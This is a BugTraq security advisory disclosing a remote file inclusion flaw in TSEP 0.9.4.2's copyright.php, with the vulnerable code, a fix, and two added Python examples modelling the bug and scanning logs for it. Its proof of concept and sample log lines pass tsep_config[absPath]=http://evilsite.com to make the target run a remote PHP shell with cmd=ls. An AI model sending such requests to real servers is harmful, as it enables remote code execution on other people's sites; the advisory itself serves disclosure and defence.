BugTraq
TSEP 0.9.4.2 <= Remote File Inclusion Aug 01 2006 09:18AM
philipp niedziela gmx de
+--------------------------------------------------------------------

+

+ TSEP 0.9.4.2

+

+--------------------------------------------------------------------

+

+ Affected Software .: TSEP 0.9.4.2

+ Vendor ............: http://www.tsep.info/

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /include/copyright.php:

+

+ .....

+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>

+ .....

+

+--------------------------------------------------------------------

+

+ $tsep_config["absPath"] is used in the require() above without ever being
+ initialised: copyright.php does not include the configuration file that
+ normally defines it. On installations with register_globals enabled the
+ value can therefore be supplied by the request (tsep_config[absPath]=...),
+ and with URL includes enabled (allow_url_fopen, or allow_url_include on
+ PHP 5.2 and later) require() fetches and executes the attacker's file.

+
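The following is an added example, not code from TSEP or from the advisory. It reproduces in Python the two PHP behaviours the bug depends on so the mechanics can be examined offline: register_globals turning a GET parameter named tsep_config[absPath] into $tsep_config["absPath"], and the concatenation with "/include/tsepversion.txt" shown in the code excerpt. It also carries a defence-in-depth check of the kind one would add beside the advisory's fix. INSTALL_ROOT, abs_path_problem() and hardened_include_target() are assumptions for illustration, not part of the product.

```python
"""Model of the copyright.php include path and a hardened check for it.

Added example, not TSEP code. INCLUDE_SUFFIX comes from the advisory's code
excerpt; INSTALL_ROOT and the check in abs_path_problem() are assumptions.
"""
from __future__ import annotations

import os
import re
from urllib.parse import parse_qsl, urlsplit

INCLUDE_SUFFIX = "/include/tsepversion.txt"  # fixed suffix from the advisory's excerpt
INSTALL_ROOT = "/srv/www/tsep"               # assumed installation directory

_ARRAY_KEY = re.compile(r"^([^\[]+)\[([^\]]*)\]$")


def register_globals(query: str) -> dict:
    """Emulate PHP register_globals for one level of array syntax:
    'tsep_config[absPath]=x' -> {'tsep_config': {'absPath': 'x'}}."""
    result: dict = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = _ARRAY_KEY.match(key)
        if m:
            result.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            result[key] = value
    return result


def vulnerable_include_target(query: str) -> str:
    """The string copyright.php passes to require() when $tsep_config was never
    initialised and register_globals is on: attacker value + fixed suffix."""
    tsep_config = register_globals(query).get("tsep_config", {})
    return tsep_config.get("absPath", "") + INCLUDE_SUFFIX


def fetched_url(include_target: str) -> dict:
    """How an http:// stream wrapper splits that target: everything after the
    first '?' is query string, so a '?' inside absPath pushes the suffix into
    the query and the request goes to the host's root path."""
    parts = urlsplit(include_target)
    return {"host": parts.netloc, "path": parts.path, "query": parts.query}


def abs_path_problem(abs_path: str) -> str | None:
    """Assumed defence-in-depth check for absPath; None means acceptable.
    Only an absolute local path that resolves inside INSTALL_ROOT passes, which
    rejects http://, ftp://, php://, data: and any other wrapper as well as
    ../ escapes out of the installation directory."""
    if not abs_path.startswith("/"):
        return "absPath must be an absolute local path"
    root = os.path.realpath(INSTALL_ROOT)
    real = os.path.realpath(abs_path)
    if real != root and not real.startswith(root + os.sep):
        return "absPath resolves outside the installation root"
    return None


def hardened_include_target(abs_path: str) -> str:
    """Build the include path only after abs_path has passed the check."""
    problem = abs_path_problem(abs_path)
    if problem:
        raise ValueError(problem)
    return os.path.realpath(abs_path) + INCLUDE_SUFFIX
```

Running the advisory's PoC query through vulnerable_include_target() and fetched_url() shows that the trailing "?cmd=ls" moves the appended "/include/tsepversion.txt" into the query string, which is why that style of PoC needs the shell at the root of the attacker's host. The check is a second line of defence only: the actual fix is to define $tsep_config from the configuration file before the require, as the advisory's solution says.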

+--------------------------------------------------------------------

+

+ Solution:

+ Include the configuration file that defines $tsep_config["absPath"] at the
+ top of copyright.php, before the require(), so the value can no longer be
+ supplied by the request. Disabling register_globals and URL includes in
+ php.ini removes the precondition for this and similar bugs.

+

+--------------------------------------------------------------------

+

+ PoC:

+ Place a PHPShell on a remote location:

+ http://evilsite.com/include/tsepversion.txt

+

+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls

+ Note: copyright.php appends "/include/tsepversion.txt" to the supplied
+ value, so the request above makes the target fetch http://evilsite.com/
+ with the query string cmd=ls/include/tsepversion.txt; the shell must then
+ answer at the root of evilsite.com. To have it fetched from the path named
+ above instead, pass tsep_config[absPath]=http://evilsite.com without the
+ trailing ?cmd=ls.

+
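As an added example (not part of the advisory), the detection logic a defender would run over web-server logs for this bug: it parses each request, extracts any query parameter that would populate $tsep_config[...] under register_globals, and rates the hit by whether the value names a stream wrapper. The access-log lines are constructed (Apache combined format; addresses, hosts and timestamps are made up); only the parameter name and the copyright.php path come from the advisory.

```python
"""Flag requests that try to set $tsep_config[...] through the query string.

Added example, not from the advisory. SAMPLE_ACCESS_LOG is constructed data.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [01/Aug/2006:09:18:00 +0200] "GET /include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [01/Aug/2006:09:18:03 +0200] "GET /include/copyright.php?tsep_config%5BabsPath%5D=ftp%3A%2F%2Fevilsite.com%2Fs HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [01/Aug/2006:09:19:10 +0200] "GET /index.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Aug/2006:09:20:00 +0200] "GET /include/copyright.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.8 - - [01/Aug/2006:09:21:00 +0200] "GET /index.php?tsep_config[absPath]=/etc HTTP/1.1" 200 300 "-" "curl/7.15"
"""

# Apache combined format: client, identd, user, [time] "METHOD target proto" status ...
_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any parameter of the form tsep_config[...] would land in $tsep_config under register_globals.
_CONFIG_KEY = re.compile(r"^tsep_config\[[^\]]*\]$", re.IGNORECASE)
# A value starting with a scheme (http:, ftp:, php:, data:, ...) is a stream-wrapper attempt.
_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)


def injected_config_params(target: str) -> list[tuple[str, str]]:
    """(name, value) pairs in the request's query string that would populate
    $tsep_config. parse_qsl decodes one level of percent-encoding; the extra
    unquote() on the key also catches a doubly encoded parameter name."""
    query = urlsplit(target).query
    return [
        (key, value)
        for key, value in parse_qsl(query, keep_blank_values=True)
        if _CONFIG_KEY.match(unquote(key))
    ]


def classify(line: str) -> dict | None:
    """One alert per request carrying a tsep_config[...] parameter.
    'high' when a value names a stream wrapper (remote include attempt),
    'medium' for a local path (still probing for the uninitialised variable)."""
    m = _LINE.match(line)
    if not m:
        return None
    params = injected_config_params(m["target"])
    if not params:
        return None
    remote = any(_SCHEME.match(value) for _, value in params)
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "target": m["target"],
        "params": params,
        "severity": "high" if remote else "medium",
    }


def scan(log_text: str) -> list[dict]:
    """Run classify() over every line and keep only the alerts."""
    return [alert for alert in map(classify, log_text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_ACCESS_LOG):
        print(alert["severity"], alert["ip"], alert["params"])
```

Matching on the parameter name rather than on "copyright.php" alone is deliberate: the same uninitialised variable pattern may exist in other scripts, and a request that sets tsep_config[absPath] has no legitimate reason to exist on any page.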

+--------------------------------------------------------------------

+

+ Greets:

+ Krini Gonzales (5 YEARS :P)

+

+-------------------------[ E O F ]----------------------------------
